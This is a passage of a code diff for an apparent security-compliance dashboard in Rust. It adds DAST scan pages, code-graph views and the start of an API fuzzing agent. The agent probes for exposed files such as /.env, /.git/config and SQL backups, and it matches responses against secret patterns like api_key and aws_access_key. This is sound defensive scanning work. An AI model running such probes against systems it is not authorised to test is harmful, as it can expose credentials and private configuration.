pub toast_type: ToastType,
}
#[derive(Clone, Copy)]
pub struct Toasts {
items: Signal<Vec<ToastMessage>>,
next_id: Signal<usize>,
}
impl Toasts {
pub fn new() -> Self {
Self {
items: Signal::new(vec![]),
next_id: Signal::new(0),
}
}
pub fn push(&mut self, toast_type: ToastType, message: impl Into<String>) {
let id = *self.next_id.read();
*self.next_id.write() = id + 1;
self.items.write().push(ToastMessage {
id,
message: message.into(),
toast_type,
});
#[cfg(feature = "web")]
{
let mut items = self.items;
spawn(async move {
gloo_timers::future::TimeoutFuture::new(4_000).await;
items.write().retain(|t| t.id != id);
});
}
}
pub fn remove(&mut self, id: usize) {
self.items.write().retain(|t| t.id != id);
}
}
#[component]
pub fn ToastContainer() -> Element {
let mut toasts = use_context::<Toasts>();
let items = toasts.items.read();
rsx! {
div { class: "toast-container",
for toast in items.iter() {
{
let toast_id = toast.id;
let type_class = match toast.toast_type {
ToastType::Success => "toast-success",
ToastType::Error => "toast-error",
ToastType::Info => "toast-info",
};
rsx! {
div {
key: "{toast_id}",
class: "toast {type_class}",
span { "{toast.message}" }
button {
class: "toast-dismiss",
onclick: move |_| toasts.remove(toast_id),
"\u{00d7}"
}
}
}
}
}
}
}
}

View File

@@ -0,0 +1,125 @@
use dioxus::prelude::*;
use serde::{Deserialize, Serialize};
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct DastTargetsResponse {
pub data: Vec<serde_json::Value>,
pub total: Option<u64>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct DastScanRunsResponse {
pub data: Vec<serde_json::Value>,
pub total: Option<u64>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct DastFindingsResponse {
pub data: Vec<serde_json::Value>,
pub total: Option<u64>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct DastFindingDetailResponse {
pub data: serde_json::Value,
}
#[server]
pub async fn fetch_dast_targets() -> Result<DastTargetsResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/dast/targets", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: DastTargetsResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn fetch_dast_scan_runs() -> Result<DastScanRunsResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/dast/scan-runs", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: DastScanRunsResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn fetch_dast_findings() -> Result<DastFindingsResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/dast/findings", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: DastFindingsResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn fetch_dast_finding_detail(
id: String,
) -> Result<DastFindingDetailResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/dast/findings/{id}", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: DastFindingDetailResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn add_dast_target(
name: String,
base_url: String,
) -> Result<(), ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/dast/targets", state.agent_api_url);
let client = reqwest::Client::new();
client
.post(&url)
.json(&serde_json::json!({
"name": name,
"base_url": base_url,
}))
.send()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(())
}
#[server]
pub async fn trigger_dast_scan(target_id: String) -> Result<(), ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!(
"{}/api/v1/dast/targets/{target_id}/scan",
state.agent_api_url
);
let client = reqwest::Client::new();
client
.post(&url)
.send()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(())
}

View File

@@ -0,0 +1,96 @@
use dioxus::prelude::*;
use serde::{Deserialize, Serialize};
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct GraphDataResponse {
pub data: GraphData,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct GraphData {
pub build: Option<serde_json::Value>,
pub nodes: Vec<serde_json::Value>,
pub edges: Vec<serde_json::Value>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct ImpactResponse {
pub data: Option<serde_json::Value>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct CommunitiesResponse {
pub data: Vec<serde_json::Value>,
pub total: Option<u64>,
}
#[derive(Debug, Clone, Serialize, Deserialize, Default)]
pub struct NodesResponse {
pub data: Vec<serde_json::Value>,
pub total: Option<u64>,
}
#[server]
pub async fn fetch_graph(repo_id: String) -> Result<GraphDataResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/graph/{repo_id}", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: GraphDataResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn fetch_impact(
repo_id: String,
finding_id: String,
) -> Result<ImpactResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!(
"{}/api/v1/graph/{repo_id}/impact/{finding_id}",
state.agent_api_url
);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: ImpactResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn fetch_communities(repo_id: String) -> Result<CommunitiesResponse, ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/graph/{repo_id}/communities", state.agent_api_url);
let resp = reqwest::get(&url)
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
let body: CommunitiesResponse = resp
.json()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(body)
}
#[server]
pub async fn trigger_graph_build(repo_id: String) -> Result<(), ServerFnError> {
let state: super::server_state::ServerState =
dioxus_fullstack::FullstackContext::extract().await?;
let url = format!("{}/api/v1/graph/{repo_id}/build", state.agent_api_url);
let client = reqwest::Client::new();
client
.post(&url)
.send()
.await
.map_err(|e| ServerFnError::new(e.to_string()))?;
Ok(())
}

View File

@@ -1,6 +1,8 @@
// Server function modules (compiled for both web and server;
// the #[server] macro generates client stubs for the web target)
pub mod dast;
pub mod findings;
pub mod graph;
pub mod issues;
pub mod repositories;
pub mod sbom;

View File

@@ -0,0 +1,113 @@
use dioxus::prelude::*;
use crate::components::page_header::PageHeader;
use crate::components::severity_badge::SeverityBadge;
use crate::infrastructure::dast::fetch_dast_finding_detail;
#[component]
pub fn DastFindingDetailPage(id: String) -> Element {
let finding = use_resource(move || {
let fid = id.clone();
async move { fetch_dast_finding_detail(fid).await.ok() }
});
rsx! {
PageHeader {
title: "DAST Finding Detail",
description: "Full evidence and details for a dynamic security finding",
}
div { class: "card",
match &*finding.read() {
Some(Some(resp)) => {
let f = resp.data.clone();
let severity = f.get("severity").and_then(|v| v.as_str()).unwrap_or("info").to_string();
rsx! {
div { class: "flex items-center gap-4 mb-4",
SeverityBadge { severity: severity }
h2 { "{f.get(\"title\").and_then(|v| v.as_str()).unwrap_or(\"Unknown Finding\")}" }
}
div { class: "grid grid-cols-2 gap-4 mb-4",
div {
strong { "Vulnerability Type: " }
span { class: "badge", "{f.get(\"vuln_type\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
}
div {
strong { "CWE: " }
span { "{f.get(\"cwe\").and_then(|v| v.as_str()).unwrap_or(\"N/A\")}" }
}
div {
strong { "Endpoint: " }
code { "{f.get(\"endpoint\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
}
div {
strong { "Method: " }
span { "{f.get(\"method\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
}
div {
strong { "Parameter: " }
code { "{f.get(\"parameter\").and_then(|v| v.as_str()).unwrap_or(\"N/A\")}" }
}
div {
strong { "Exploitable: " }
if f.get("exploitable").and_then(|v| v.as_bool()).unwrap_or(false) {
span { class: "badge badge-danger", "Confirmed" }
} else {
span { class: "badge", "Unconfirmed" }
}
}
}
h3 { "Description" }
p { "{f.get(\"description\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
if let Some(remediation) = f.get("remediation").and_then(|v| v.as_str()) {
h3 { class: "mt-4", "Remediation" }
p { "{remediation}" }
}
h3 { class: "mt-4", "Evidence" }
if let Some(evidence_list) = f.get("evidence").and_then(|v| v.as_array()) {
for (i, evidence) in evidence_list.iter().enumerate() {
div { class: "card mb-3",
h4 { "Evidence #{i + 1}" }
div { class: "grid grid-cols-2 gap-2",
div {
strong { "Request: " }
code { "{evidence.get(\"request_method\").and_then(|v| v.as_str()).unwrap_or(\"-\")} {evidence.get(\"request_url\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
}
div {
strong { "Response Status: " }
span { "{evidence.get(\"response_status\").and_then(|v| v.as_u64()).unwrap_or(0)}" }
}
}
if let Some(payload) = evidence.get("payload").and_then(|v| v.as_str()) {
div { class: "mt-2",
strong { "Payload: " }
code { class: "block bg-gray-900 text-green-400 p-2 rounded mt-1",
"{payload}"
}
}
}
if let Some(snippet) = evidence.get("response_snippet").and_then(|v| v.as_str()) {
div { class: "mt-2",
strong { "Response Snippet: " }
pre { class: "block bg-gray-900 text-gray-300 p-2 rounded mt-1 overflow-x-auto text-sm",
"{snippet}"
}
}
}
}
}
} else {
p { "No evidence collected." }
}
}
},
Some(None) => rsx! { p { "Finding not found." } },
None => rsx! { p { "Loading..." } },
}
}
}
}

View File

@@ -0,0 +1,79 @@
use dioxus::prelude::*;
use crate::app::Route;
use crate::components::page_header::PageHeader;
use crate::components::severity_badge::SeverityBadge;
use crate::infrastructure::dast::fetch_dast_findings;
#[component]
pub fn DastFindingsPage() -> Element {
let findings = use_resource(|| async { fetch_dast_findings().await.ok() });
rsx! {
PageHeader {
title: "DAST Findings",
description: "Vulnerabilities discovered through dynamic application security testing",
}
div { class: "card",
match &*findings.read() {
Some(Some(data)) => {
let finding_list = &data.data;
if finding_list.is_empty() {
rsx! { p { "No DAST findings yet. Run a scan to discover vulnerabilities." } }
} else {
rsx! {
table { class: "table",
thead {
tr {
th { "Severity" }
th { "Type" }
th { "Title" }
th { "Endpoint" }
th { "Method" }
th { "Exploitable" }
}
}
tbody {
for finding in finding_list {
{
let id = finding.get("_id").and_then(|v| v.get("$oid")).and_then(|v| v.as_str()).unwrap_or("").to_string();
let severity = finding.get("severity").and_then(|v| v.as_str()).unwrap_or("info").to_string();
rsx! {
tr {
td { SeverityBadge { severity: severity } }
td {
span { class: "badge",
"{finding.get(\"vuln_type\").and_then(|v| v.as_str()).unwrap_or(\"-\")}"
}
}
td {
Link {
to: Route::DastFindingDetailPage { id: id },
"{finding.get(\"title\").and_then(|v| v.as_str()).unwrap_or(\"-\")}"
}
}
td { code { class: "text-sm", "{finding.get(\"endpoint\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" } }
td { "{finding.get(\"method\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
td {
if finding.get("exploitable").and_then(|v| v.as_bool()).unwrap_or(false) {
span { class: "badge badge-danger", "Confirmed" }
} else {
span { class: "badge", "Unconfirmed" }
}
}
}
}
}
}
}
}
}
}
},
Some(None) => rsx! { p { "Failed to load findings." } },
None => rsx! { p { "Loading..." } },
}
}
}
}

View File

@@ -0,0 +1,107 @@
use dioxus::prelude::*;
use crate::app::Route;
use crate::components::page_header::PageHeader;
use crate::infrastructure::dast::{fetch_dast_findings, fetch_dast_scan_runs};
#[component]
pub fn DastOverviewPage() -> Element {
let scan_runs = use_resource(|| async { fetch_dast_scan_runs().await.ok() });
let findings = use_resource(|| async { fetch_dast_findings().await.ok() });
rsx! {
PageHeader {
title: "DAST Overview",
description: "Dynamic Application Security Testing — scan running applications for vulnerabilities",
}
div { class: "grid grid-cols-3 gap-4 mb-6",
div { class: "stat-card",
div { class: "stat-value",
match &*scan_runs.read() {
Some(Some(data)) => {
let count = data.total.unwrap_or(0);
rsx! { "{count}" }
},
_ => rsx! { "" },
}
}
div { class: "stat-label", "Total Scans" }
}
div { class: "stat-card",
div { class: "stat-value",
match &*findings.read() {
Some(Some(data)) => {
let count = data.total.unwrap_or(0);
rsx! { "{count}" }
},
_ => rsx! { "" },
}
}
div { class: "stat-label", "DAST Findings" }
}
div { class: "stat-card",
div { class: "stat-value", "" }
div { class: "stat-label", "Active Targets" }
}
}
div { class: "flex gap-4 mb-4",
Link {
to: Route::DastTargetsPage {},
class: "btn btn-primary",
"Manage Targets"
}
Link {
to: Route::DastFindingsPage {},
class: "btn btn-secondary",
"View Findings"
}
}
div { class: "card",
h3 { "Recent Scan Runs" }
match &*scan_runs.read() {
Some(Some(data)) => {
let runs = &data.data;
if runs.is_empty() {
rsx! { p { "No scan runs yet." } }
} else {
rsx! {
table { class: "table",
thead {
tr {
th { "Target" }
th { "Status" }
th { "Phase" }
th { "Findings" }
th { "Exploitable" }
th { "Started" }
}
}
tbody {
for run in runs {
tr {
td { "{run.get(\"target_id\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
td {
span { class: "badge",
"{run.get(\"status\").and_then(|v| v.as_str()).unwrap_or(\"unknown\")}"
}
}
td { "{run.get(\"current_phase\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
td { "{run.get(\"findings_count\").and_then(|v| v.as_u64()).unwrap_or(0)}" }
td { "{run.get(\"exploitable_count\").and_then(|v| v.as_u64()).unwrap_or(0)}" }
td { "{run.get(\"started_at\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
}
}
}
}
}
}
},
Some(None) => rsx! { p { "Failed to load scan runs." } },
None => rsx! { p { "Loading..." } },
}
}
}
}

View File

@@ -0,0 +1,145 @@
use dioxus::prelude::*;
use crate::components::page_header::PageHeader;
use crate::components::toast::{ToastType, Toasts};
use crate::infrastructure::dast::{add_dast_target, fetch_dast_targets, trigger_dast_scan};
#[component]
pub fn DastTargetsPage() -> Element {
let mut targets = use_resource(|| async { fetch_dast_targets().await.ok() });
let mut toasts = use_context::<Toasts>();
let mut show_form = use_signal(|| false);
let mut new_name = use_signal(String::new);
let mut new_url = use_signal(String::new);
rsx! {
PageHeader {
title: "DAST Targets",
description: "Configure target applications for dynamic security testing",
}
div { class: "mb-4",
button {
class: "btn btn-primary",
onclick: move |_| show_form.set(!show_form()),
if show_form() { "Cancel" } else { "Add Target" }
}
}
if show_form() {
div { class: "card mb-4",
h3 { "Add New Target" }
div { class: "form-group",
label { "Name" }
input {
class: "input",
r#type: "text",
placeholder: "My Web App",
value: "{new_name}",
oninput: move |e| new_name.set(e.value()),
}
}
div { class: "form-group",
label { "Base URL" }
input {
class: "input",
r#type: "text",
placeholder: "https://example.com",
value: "{new_url}",
oninput: move |e| new_url.set(e.value()),
}
}
button {
class: "btn btn-primary",
onclick: move |_| {
let name = new_name();
let url = new_url();
spawn(async move {
match add_dast_target(name, url).await {
Ok(_) => {
toasts.push(ToastType::Success, "Target created");
targets.restart();
}
Err(e) => toasts.push(ToastType::Error, e.to_string()),
}
});
show_form.set(false);
new_name.set(String::new());
new_url.set(String::new());
},
"Create Target"
}
}
}
div { class: "card",
h3 { "Configured Targets" }
match &*targets.read() {
Some(Some(data)) => {
let target_list = &data.data;
if target_list.is_empty() {
rsx! { p { "No DAST targets configured. Add one to get started." } }
} else {
rsx! {
table { class: "table",
thead {
tr {
th { "Name" }
th { "URL" }
th { "Type" }
th { "Rate Limit" }
th { "Destructive" }
th { "Actions" }
}
}
tbody {
for target in target_list {
{
let target_id = target.get("_id").and_then(|v| v.get("$oid")).and_then(|v| v.as_str()).unwrap_or("").to_string();
rsx! {
tr {
td { "{target.get(\"name\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
td { code { "{target.get(\"base_url\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" } }
td { "{target.get(\"target_type\").and_then(|v| v.as_str()).unwrap_or(\"-\")}" }
td { "{target.get(\"rate_limit\").and_then(|v| v.as_u64()).unwrap_or(0)} req/s" }
td {
if target.get("allow_destructive").and_then(|v| v.as_bool()).unwrap_or(false) {
span { class: "badge badge-danger", "Yes" }
} else {
span { class: "badge badge-success", "No" }
}
}
td {
button {
class: "btn btn-sm",
onclick: {
let tid = target_id.clone();
move |_| {
let tid = tid.clone();
spawn(async move {
match trigger_dast_scan(tid).await {
Ok(_) => toasts.push(ToastType::Success, "DAST scan triggered"),
Err(e) => toasts.push(ToastType::Error, e.to_string()),
}
});
}
},
"Scan"
}
}
}
}
}
}
}
}
}
}
},
Some(None) => rsx! { p { "Failed to load targets." } },
None => rsx! { p { "Loading..." } },
}
}
}
}

View File

@@ -0,0 +1,105 @@
use dioxus::prelude::*;
use crate::components::page_header::PageHeader;
use crate::components::toast::{ToastType, Toasts};
use crate::infrastructure::graph::{fetch_graph, trigger_graph_build};
#[component]
pub fn GraphExplorerPage(repo_id: String) -> Element {
let repo_id_clone = repo_id.clone();
let mut graph_data = use_resource(move || {
let rid = repo_id_clone.clone();
async move {
if rid.is_empty() {
return None;
}
fetch_graph(rid).await.ok()
}
});
let mut building = use_signal(|| false);
let mut toasts = use_context::<Toasts>();
rsx! {
PageHeader {
title: "Code Knowledge Graph",
description: "Interactive visualization of code structure and relationships",
}
if repo_id.is_empty() {
div { class: "card",
p { "Select a repository to view its code graph." }
p { "You can trigger a graph build from the Repositories page." }
}
} else {
div { style: "margin-bottom: 16px;",
button {
class: "btn btn-primary",
disabled: building(),
onclick: {
let rid = repo_id.clone();
move |_| {
let rid = rid.clone();
building.set(true);
spawn(async move {
match trigger_graph_build(rid).await {
Ok(_) => toasts.push(ToastType::Success, "Graph build triggered"),
Err(e) => toasts.push(ToastType::Error, e.to_string()),
}
building.set(false);
graph_data.restart();
});
}
},
if building() { "Building..." } else { "Build Graph" }
}
}
div { class: "card",
h3 { "Graph Explorer \u{2014} {repo_id}" }
match &*graph_data.read() {
Some(Some(data)) => {
let build = data.data.build.clone().unwrap_or_default();
let node_count = build.get("node_count").and_then(|n| n.as_u64()).unwrap_or(0);
let edge_count = build.get("edge_count").and_then(|n| n.as_u64()).unwrap_or(0);
let community_count = build.get("community_count").and_then(|n| n.as_u64()).unwrap_or(0);
rsx! {
div { class: "grid grid-cols-3 gap-4 mb-4",
div { class: "stat-card",
div { class: "stat-value", "{node_count}" }
div { class: "stat-label", "Nodes" }
}
div { class: "stat-card",
div { class: "stat-value", "{edge_count}" }
div { class: "stat-label", "Edges" }
}
div { class: "stat-card",
div { class: "stat-value", "{community_count}" }
div { class: "stat-label", "Communities" }
}
}
div {
id: "graph-container",
style: "width: 100%; height: 600px; border: 1px solid var(--border); border-radius: 8px; background: var(--bg-secondary);",
}
script {
r#"
console.log('Graph explorer loaded');
"#
}
}
},
Some(None) => rsx! {
p { "No graph data available. Build the graph first." }
},
None => rsx! {
p { "Loading graph data..." }
},
}
}
}
}
}

View File

@@ -0,0 +1,53 @@
use dioxus::prelude::*;
use crate::app::Route;
use crate::components::page_header::PageHeader;
use crate::infrastructure::repositories::fetch_repositories;
#[component]
pub fn GraphIndexPage() -> Element {
let repos = use_resource(|| async { fetch_repositories(1).await.ok() });
rsx! {
PageHeader {
title: "Code Knowledge Graph",
description: "Select a repository to explore its code graph",
}
div { class: "card",
h3 { "Repositories" }
match &*repos.read() {
Some(Some(data)) => {
let repo_list = &data.data;
if repo_list.is_empty() {
rsx! { p { "No repositories found. Add a repository first." } }
} else {
rsx! {
div { class: "grid grid-cols-1 gap-3",
for repo in repo_list {
{
let repo_id = repo.id.map(|id| id.to_hex()).unwrap_or_default();
let name = repo.name.clone();
let url = repo.git_url.clone();
rsx! {
Link {
to: Route::GraphExplorerPage { repo_id: repo_id },
class: "card hover:bg-gray-800 transition-colors cursor-pointer",
h4 { "{name}" }
if !url.is_empty() {
p { class: "text-sm text-muted", "{url}" }
}
}
}
}
}
}
}
}
},
Some(None) => rsx! { p { "Failed to load repositories." } },
None => rsx! { p { "Loading repositories..." } },
}
}
}
}

View File

@@ -0,0 +1,97 @@
use dioxus::prelude::*;
use crate::components::page_header::PageHeader;
use crate::infrastructure::graph::fetch_impact;
#[component]
pub fn ImpactAnalysisPage(repo_id: String, finding_id: String) -> Element {
let impact_data = use_resource(move || {
let rid = repo_id.clone();
let fid = finding_id.clone();
async move { fetch_impact(rid, fid).await.ok() }
});
rsx! {
PageHeader {
title: "Impact Analysis",
description: "Blast radius and affected entry points for a security finding",
}
div { class: "card",
match &*impact_data.read() {
Some(Some(resp)) => {
let impact = resp.data.clone().unwrap_or_default();
rsx! {
div { class: "grid grid-cols-2 gap-4 mb-4",
div { class: "stat-card",
div { class: "stat-value",
"{impact.get(\"blast_radius\").and_then(|v| v.as_u64()).unwrap_or(0)}"
}
div { class: "stat-label", "Blast Radius (nodes affected)" }
}
div { class: "stat-card",
div { class: "stat-value",
"{impact.get(\"affected_entry_points\").and_then(|v| v.as_array()).map(|a| a.len()).unwrap_or(0)}"
}
div { class: "stat-label", "Entry Points Affected" }
}
}
h3 { "Affected Entry Points" }
if let Some(entries) = impact.get("affected_entry_points").and_then(|v| v.as_array()) {
if entries.is_empty() {
p { class: "text-muted", "No entry points affected." }
} else {
ul { class: "list",
for entry in entries {
li { "{entry.as_str().unwrap_or(\"-\")}" }
}
}
}
}
h3 { class: "mt-4", "Call Chains" }
if let Some(chains) = impact.get("call_chains").and_then(|v| v.as_array()) {
if chains.is_empty() {
p { class: "text-muted", "No call chains found." }
} else {
for (i, chain) in chains.iter().enumerate() {
div { class: "card mb-2",
strong { "Chain {i + 1}: " }
if let Some(steps) = chain.as_array() {
for (j, step) in steps.iter().enumerate() {
span { "{step.as_str().unwrap_or(\"-\")}" }
if j < steps.len() - 1 {
span { class: "text-muted", "" }
}
}
}
}
}
}
}
h3 { class: "mt-4", "Direct Callers" }
if let Some(callers) = impact.get("direct_callers").and_then(|v| v.as_array()) {
if callers.is_empty() {
p { class: "text-muted", "No direct callers." }
} else {
ul { class: "list",
for caller in callers {
li { code { "{caller.as_str().unwrap_or(\"-\")}" } }
}
}
}
}
}
},
Some(None) => rsx! {
p { "No impact analysis data available for this finding." }
},
None => rsx! {
p { "Loading impact analysis..." }
},
}
}
}
}

View File

@@ -1,13 +1,27 @@
pub mod dast_finding_detail;
pub mod dast_findings;
pub mod dast_overview;
pub mod dast_targets;
pub mod finding_detail;
pub mod findings;
pub mod graph_explorer;
pub mod graph_index;
pub mod impact_analysis;
pub mod issues;
pub mod overview;
pub mod repositories;
pub mod sbom;
pub mod settings;
pub use dast_finding_detail::DastFindingDetailPage;
pub use dast_findings::DastFindingsPage;
pub use dast_overview::DastOverviewPage;
pub use dast_targets::DastTargetsPage;
pub use finding_detail::FindingDetailPage;
pub use findings::FindingsPage;
pub use graph_explorer::GraphExplorerPage;
pub use graph_index::GraphIndexPage;
pub use impact_analysis::ImpactAnalysisPage;
pub use issues::IssuesPage;
pub use overview::OverviewPage;
pub use repositories::RepositoriesPage;

View File

@@ -2,6 +2,7 @@ use dioxus::prelude::*;
use crate::components::page_header::PageHeader;
use crate::components::pagination::Pagination;
use crate::components::toast::{ToastType, Toasts};
#[component]
pub fn RepositoriesPage() -> Element {
@@ -10,8 +11,9 @@ pub fn RepositoriesPage() -> Element {
let mut name = use_signal(String::new);
let mut git_url = use_signal(String::new);
let mut branch = use_signal(|| "main".to_string());
let mut toasts = use_context::<Toasts>();
let repos = use_resource(move || {
let mut repos = use_resource(move || {
let p = page();
async move {
crate::infrastructure::repositories::fetch_repositories(p)
@@ -71,7 +73,13 @@ pub fn RepositoriesPage() -> Element {
let u = git_url();
let b = branch();
spawn(async move {
let _ = crate::infrastructure::repositories::add_repository(n, u, b).await;
match crate::infrastructure::repositories::add_repository(n, u, b).await {
Ok(_) => {
toasts.push(ToastType::Success, "Repository added");
repos.restart();
}
Err(e) => toasts.push(ToastType::Error, e.to_string()),
}
});
show_add_form.set(false);
name.set(String::new());
@@ -125,7 +133,10 @@ pub fn RepositoriesPage() -> Element {
onclick: move |_| {
let id = repo_id_clone.clone();
spawn(async move {
let _ = crate::infrastructure::repositories::trigger_repo_scan(id).await;
match crate::infrastructure::repositories::trigger_repo_scan(id).await {
Ok(_) => toasts.push(ToastType::Success, "Scan triggered"),
Err(e) => toasts.push(ToastType::Error, e.to_string()),
}
});
},
"Scan"

View File

@@ -0,0 +1,32 @@
[package]
name = "compliance-dast"
version = "0.1.0"
edition = "2021"
[lints]
workspace = true
[dependencies]
compliance-core = { workspace = true }
serde = { workspace = true }
serde_json = { workspace = true }
chrono = { workspace = true }
thiserror = { workspace = true }
tracing = { workspace = true }
uuid = { workspace = true }
tokio = { workspace = true }
mongodb = { workspace = true }
reqwest = { workspace = true }
# HTML parsing
scraper = "0.22"
# Browser automation
chromiumoxide = { version = "0.7", features = ["tokio-runtime"], default-features = false }
# Docker sandboxing
bollard = "0.18"
# Serialization
bson = "2"
url = "2"

View File

@@ -0,0 +1,307 @@
use compliance_core::error::CoreError;
use compliance_core::models::dast::{DastEvidence, DastFinding, DastTarget, DastVulnType};
use compliance_core::models::Severity;
use compliance_core::traits::dast_agent::{DastAgent, DastContext};
use tracing::info;
/// API fuzzing agent that tests for misconfigurations and information disclosure
pub struct ApiFuzzerAgent {
http: reqwest::Client,
}
impl ApiFuzzerAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
/// Common API paths to probe
fn discovery_paths(&self) -> Vec<(&str, &str)> {
vec![
("/.env", "Environment file exposure"),
("/.git/config", "Git config exposure"),
("/api/swagger.json", "Swagger spec exposure"),
("/api/openapi.json", "OpenAPI spec exposure"),
("/api-docs", "API documentation exposure"),
("/graphql", "GraphQL endpoint"),
("/debug", "Debug endpoint"),
("/actuator/health", "Spring actuator"),
("/wp-config.php.bak", "WordPress config backup"),
("/.well-known/openid-configuration", "OIDC config"),
("/server-status", "Apache server status"),
("/phpinfo.php", "PHP info exposure"),
("/robots.txt", "Robots.txt"),
("/sitemap.xml", "Sitemap"),
("/.htaccess", "htaccess exposure"),
("/backup.sql", "SQL backup exposure"),
("/api/v1/users", "User enumeration endpoint"),
]
}
/// Patterns indicating sensitive information disclosure
fn sensitive_patterns(&self) -> Vec<&str> {
vec![
"password",
"api_key",
"apikey",
"secret",
"token",
"private_key",
"aws_access_key",
"jdbc:",
"mongodb://",
"redis://",
"postgresql://",
]
}
}
impl DastAgent for ApiFuzzerAgent {
fn name(&self) -> &str {
"api_fuzzer"
}
async fn run(
&self,
target: &DastTarget,
_context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
let mut findings = Vec::new();
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
let base = target.base_url.trim_end_matches('/');
// Phase 1: Path discovery
for (path, description) in self.discovery_paths() {
let url = format!("{base}{path}");
let response = match self.http.get(&url).send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
if status == 200 {
let body = response.text().await.unwrap_or_default();
// Check if it's actually sensitive content (not just a 200 catch-all)
let is_sensitive = !body.is_empty()
&& body.len() > 10
&& !body.contains("404")
&& !body.contains("not found");
if is_sensitive {
let snippet = body.chars().take(500).collect::<String>();
// Check for information disclosure
let body_lower = body.to_lowercase();
let has_secrets = self
.sensitive_patterns()
.iter()
.any(|p| body_lower.contains(p));
let severity = if has_secrets {
Severity::Critical
} else if path.contains(".env")
|| path.contains(".git")
|| path.contains("backup")
{
Severity::High
} else {
Severity::Medium
};
let evidence = DastEvidence {
request_method: "GET".to_string(),
request_url: url.clone(),
request_headers: None,
request_body: None,
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: None,
response_time_ms: None,
};
let vuln_type = if has_secrets {
DastVulnType::InformationDisclosure
} else {
DastVulnType::SecurityMisconfiguration
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
vuln_type,
format!("{description}: {path}"),
format!(
"Sensitive resource accessible at {url}. {}",
if has_secrets {
"Response contains potentially sensitive information."
} else {
"This resource should not be publicly accessible."
}
),
severity,
url,
"GET".to_string(),
);
finding.exploitable = has_secrets;
finding.evidence = vec![evidence];
finding.cwe = Some(if has_secrets {
"CWE-200".to_string()
} else {
"CWE-16".to_string()
});
findings.push(finding);
}
}
}
// Phase 2: CORS misconfiguration check
let cors_finding = self.check_cors(base, &target_id).await;
if let Some(f) = cors_finding {
findings.push(f);
}
// Phase 3: Check for verbose error responses
let error_url = format!("{base}/nonexistent-path-{}", uuid::Uuid::new_v4());
if let Ok(response) = self.http.get(&error_url).send().await {
let body = response.text().await.unwrap_or_default();
let body_lower = body.to_lowercase();
let has_stack_trace = body_lower.contains("traceback")
|| body_lower.contains("stack trace")
|| body_lower.contains("at line")
|| body_lower.contains("exception in")
|| body_lower.contains("error in")
|| (body_lower.contains(".py") && body_lower.contains("line"));
if has_stack_trace {
let snippet = body.chars().take(500).collect::<String>();
